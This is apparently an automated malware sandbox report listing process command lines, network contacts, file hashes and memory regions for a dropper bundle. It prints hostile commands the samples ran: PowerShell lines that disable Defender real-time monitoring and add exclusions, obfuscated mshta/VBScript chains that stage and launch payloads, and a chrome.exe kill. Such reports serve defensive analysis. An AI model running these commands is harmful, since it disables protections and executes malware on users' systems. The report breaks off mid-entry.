C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193e530416b51740a.exe

Tue193e530416b51740a.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19cef5687a.exe

Tue19cef5687a.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue197e9ec0ff0.exe

Tue197e9ec0ff0.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe

Tue196397c0f84f8.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19ac3c92c21.exe

Tue19ac3c92c21.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe

Tue19f40f8518b9946.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1932df4dae.exe

Tue1932df4dae.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1968b7ee9058232e8.exe

Tue1968b7ee9058232e8.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe

Tue193129b31e741ef3.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19c9e031f4.exe

Tue19c9e031f4.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19d1fc7d2654d7a.exe

Tue19d1fc7d2654d7a.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue192c34b1c2f5.exe

Tue192c34b1c2f5.exe /mixone

C:\Users\Admin\AppData\Local\Temp\is-9QQVE.tmp\Tue196397c0f84f8.tmp

"C:\Users\Admin\AppData\Local\Temp\is-9QQVE.tmp\Tue196397c0f84f8.tmp" /SL5="$9018E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe"

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19c9e031f4.exe

"C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19c9e031f4.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1932df4dae.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1932df4dae.exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19b4b38a7569a9.exe

Tue19b4b38a7569a9.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 492

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe

"C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1932df4dae.exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1932df4dae.exe") do taskkill -iM "%~nXx" /f

C:\Users\Admin\AppData\Local\Temp\is-DM892.tmp\Tue196397c0f84f8.tmp

"C:\Users\Admin\AppData\Local\Temp\is-DM892.tmp\Tue196397c0f84f8.tmp" /SL5="$A018E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe

~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ

C:\Windows\SysWOW64\taskkill.exe

taskkill -iM "Tue1932df4dae.exe" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if ""-PyARgXd6fRp1GJRov7bdbpPssZBLJ "" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "-PyARgXd6fRp1GJRov7bdbpPssZBLJ " == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe") do taskkill -iM "%~nXx" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscrIpt: cLosE ( cREatEObjEcT ( "wscript.sHeLl" ). Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 , TruE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ECHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>F3U_R.J"

C:\Windows\SysWOW64\msiexec.exe

msiexec -Y .\bENCc.E

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193e530416b51740a.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193e530416b51740a.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19d1fc7d2654d7a.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19d1fc7d2654d7a.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1366178986-1427971907365777778-448785540-1847609419-164699858-18581328-2048674840"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 marianu.xyz udp
NL 45.133.1.107:80 tcp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 www.listincode.com udp
US 52.203.72.196:443 www.listincode.com tcp
US 8.8.8.8:53 telegatt.top udp
US 8.8.8.8:53 propanla.com udp
US 54.205.158.59:443 www.listincode.com tcp
US 8.8.8.8:53 iplogger.org udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 gcl-gb.biz udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 niemannbest.me udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 www.iyiqian.com udp
SG 13.251.16.150:80 www.iyiqian.com tcp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
FR 91.121.67.60:2151 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.133.215:80 wfsdragon.ru tcp
US 104.21.5.208:80 wfsdragon.ru tcp
NL 45.9.20.13:80 tcp
FR 51.178.186.149:80 tcp
FR 51.178.186.149:80 tcp
N/A 127.0.0.1:49286 tcp
N/A 127.0.0.1:49289 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 telegka.top udp
US 107.178.223.183:80 telegka.top tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
US 104.155.138.21:80 telegka.top tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 107.178.223.183:80 telegka.top tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 107.178.223.183:80 telegka.top tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 104.155.138.21:80 telegka.top tcp
FI 135.181.129.119:4805 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
US 107.178.223.183:80 telegka.top tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp

Files

\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe

MD5 c10ba859e90df8a8d8e7dcc8dfe5ac20
SHA1 92d43cc9db4e8e70d0eaf7f3406bad818f4a27c5
SHA256 6c77a4d421de0321d74ec8d3fca02e782ac035ef471b1218471f139557e3a023
SHA512 00fd1f5656cac70d0c769c8752d52a46f5ef3f93a10ee87f5e8ee63edd20e2d9c22cbf4f6123a835c701b432527821731e6bbc0b42b0fa5e41a52ca232d28d2a

\Users\Admin\AppData\Local\Temp\7zS45B58177\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

memory/2704-58-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/2704-61-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2704-70-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2704-80-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2704-79-0x000000006494A000-0x000000006494F000-memory.dmp

memory/2704-73-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2704-69-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2704-78-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19ac3c92c21.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe

MD5 a4bf9671a96119f7081621c2f2e8807d
SHA1 47f50ae20bfa8b277f8c8c1963613d3f4c364b94
SHA256 d9e5cf75da07717a818853d2f1aa79d3d1aaa155bb06fffed3c92ccaf972aef7
SHA512 f0af42f99f09b5c118ebd275d0b905b91d93893034c98b84c370e7243e1b55502585808cfa33a1779d478f6e308eb32f1896d57a5f6fab0edc4362def08a5b0a

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19cd42a7c874e44.exe

MD5 0c4602580c43df3321e55647c7c7dfdb
SHA1 5e4c40d78db55305ac5a30f0e36a2e84f3849cd1
SHA256 fa02543c043d0ca718baf3dfafb7f5d0c018d46ee6e0f0220095e5874f160752
SHA512 02042264bc14c72c1e8e785812b81dad218e2ecf357db5497e80eabc739c4ad7d9176b6a9e061b909dac1ea188a7ca9e3b1c610c97d52e020ccd947f286dbe11

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19cef5687a.exe

MD5 c1bc0cca3a8784bbc7d5d3e9e47e6ba4
SHA1 500970243e0e1dd57e2aad4f372da395d639b4a3
SHA256 5d1b978e6d2896796f0f63043ecaa1748c1c7245ccda02115afc5594e3f5e3b1
SHA512 929893f5359493bdcf2d2ba9d08a7fe808219c6a93f7f1433d915c520f84a9b03bd2c642722321b9875c1227672ce0773f76220bbde50aadc71754d82ffadbd5

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue197e9ec0ff0.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe

MD5 7c20266d1026a771cc3748fe31262057
SHA1 fc83150d1f81bfb2ff3c3d004ca864d53004fd27
SHA256 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46
SHA512 e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19c28f648204dbd4.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe

MD5 bf2f6094ceaa5016d7fb5e9e95059b6b
SHA1 25583e0b5a4e331a0ca97b01c5f4ecf6b2388bad
SHA256 47f383df5f55f756468fbb141377bed62056d72d933d675b3c3267d7be4b7f12
SHA512 11d54869e1690824e74e33ee2e9975d28b77730588dde0eee540eefabdedf46576395301aeb607de2cf009b721172209d66a273ca5e3144061c1bdbe41e03f78

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1932df4dae.exe

MD5 c90e5a77dd1e7e03d51988bdb057bd9f
SHA1 498bd4b07d9e11133943e63c2cf06e28d9e99fc5
SHA256 cca0d3fb3f19615d643d47b3284fe26ffe359c0d2602e5f1877193c1227bfb54
SHA512 bbdfb7452df93c9425eaea10658e662725ee0de1a30993220231c3e8385f09baeabf78484b41e5780602b51e05f28d767d35e5960c18a246d9b1072783cbad34

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193e530416b51740a.exe

MD5 a2326dff5589a00ed3fd40bc1bd0f037
SHA1 66c3727fb030f5e1d931de28374cf20e4693bbf4
SHA256 550d66af5c386718a10f69652645f21357d305b3e9477c55516201570f9ea28c
SHA512 fd56a630dc37a5322b68502e66fbe2ff54ae94ca61bf0f8e116db002d4038f85722816a5e8ec0f6c0343d250c93a7909185564166591a44d0402aa0c5928e826

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19c9e031f4.exe

MD5 0b67130e7f04d08c78cb659f54b20432
SHA1 669426ae83c4a8eacf207c7825168aca30a37ca2
SHA256 bca8618b405d504bbfe9077e3ca0f9fdb01f5b4e0e0a12409031817a522c50ac
SHA512 8f5495b850b99f92f18113d9759469768d3e16b4afa8ccdee5504886bced6a9ac75184f7c48f627ead16ce67834f5a641d6cea2cb5420e35c26e612572b12c79

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19b4b38a7569a9.exe

MD5 26278caf1df5ef5ea045185380a1d7c9
SHA1 df16e31d1dd45dc4440ec7052de2fc026071286c
SHA256 d626180356047eff85c36abbc7a1752c4f962d79070ffc7803b8db2af3be9be5
SHA512 007f092dfef8895e9b4cd3605544df9cd57e701d154ce89f950f8642462b535725edf89b58c0a240bc080a45c9b5229633fe8b2c20e90c7db65bc1e87bc44e03

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19d1fc7d2654d7a.exe

MD5 363f9dd72b0edd7f0188224fb3aee0e2
SHA1 2ee4327240df78e318937bc967799fb3b846602e
SHA256 e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167
SHA512 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue192c34b1c2f5.exe

MD5 8b6f3a6e8d9797093a78f0b85da4a1fc
SHA1 2f8346a3ec3427c5a7681d166501f8f42f620b3b
SHA256 5f465c9a74f35fef4a66cbf336dc90bed8bc8caf7b51a98cb52406942c05a0e8
SHA512 c0ad94faa01f5f3fd67a90df327bd0862243c1f335ccf2582f92867f3c751dfdaf73b7e2d86bd494ca1cc8ba199db7964d61493cd37855a35acbfe0256d2f7ef

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1968b7ee9058232e8.exe

MD5 21a61f35d0a76d0c710ba355f3054c34
SHA1 910c52f268dbbb80937c44f8471e39a461ebe1fe
SHA256 d9c606fa8e99ee0c5e55293a993fb6a69e585a32361d073907a8f8e216d278dd
SHA512 3f33f07aee83e8d1538e5e3d1b723876ddbecc2a730b8eaf7846522f78f5fc6b65ed23085c3a51e62c91dc80b73c171d8f32c44b92cf144689a834e33ea01b3e

memory/2416-129-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2496-172-0x0000000000F90000-0x0000000001000000-memory.dmp

memory/1732-171-0x00000000000F0000-0x0000000000108000-memory.dmp

memory/1404-170-0x0000000001040000-0x00000000010B2000-memory.dmp

memory/612-169-0x00000000001B0000-0x0000000000220000-memory.dmp

memory/3004-161-0x0000000001100000-0x0000000001108000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QHCI5ZEFY7UWVY6YVHV6.temp

MD5 00e1d8a2561474249aa2e4c9f3a32715
SHA1 a36897c95f9eeba324e6b9b40eb4c7ab56dcac4b
SHA256 b98d635c0058a69854824001b6dbedfb3e13923b4e5afb5ef670967393cfc3f3
SHA512 0edcbaba2058e1a9c545a6b7eaf880f92f40ab9134ea938a6f1a60fad001ccfd582e36d381dff55b863c7f38aacf49e5113d6763b10622965ccdaebd9122d641

memory/1408-193-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2416-192-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1724-191-0x0000000000400000-0x00000000004BD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-DM892.tmp\Tue196397c0f84f8.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/1732-199-0x0000000000430000-0x0000000000436000-memory.dmp

memory/2704-75-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2704-77-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2704-76-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2704-74-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2704-72-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2704-71-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS45B58177\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/2380-202-0x0000000000400000-0x0000000002F02000-memory.dmp

memory/2704-217-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2704-221-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2704-220-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2704-219-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2704-218-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2704-215-0x0000000000400000-0x000000000051C000-memory.dmp

memory/560-225-0x00000000023A0000-0x0000000002590000-memory.dmp

memory/1280-226-0x0000000000400000-0x00000000016FB000-memory.dmp

memory/2600-227-0x0000000000400000-0x0000000002F22000-memory.dmp

memory/2436-247-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2948-265-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2436-268-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2948-267-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2436-263-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2948-262-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2948-261-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2436-260-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2436-259-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2948-257-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2948-255-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2948-253-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2436-249-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2436-245-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2436-243-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2704-275-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2704-278-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2704-277-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2704-276-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2704-273-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2704-269-0x0000000000400000-0x000000000051C000-memory.dmp

memory/2560-280-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/1408-279-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2560-284-0x0000000002DA0000-0x0000000002EFC000-memory.dmp

memory/2560-283-0x0000000002AD0000-0x0000000002C2C000-memory.dmp

memory/2844-292-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2844-300-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2844-290-0x0000000000400000-0x0000000000422000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:28

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

158s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7dc7ca24149bd2f34bc1bf8942cb3ed8730482e4e90a16b5333092ddb80bd084.exe"

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7dc7ca24149bd2f34bc1bf8942cb3ed8730482e4e90a16b5333092ddb80bd084.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\7dc7ca24149bd2f34bc1bf8942cb3ed8730482e4e90a16b5333092ddb80bd084.exe

"C:\Users\Admin\AppData\Local\Temp\7dc7ca24149bd2f34bc1bf8942cb3ed8730482e4e90a16b5333092ddb80bd084.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

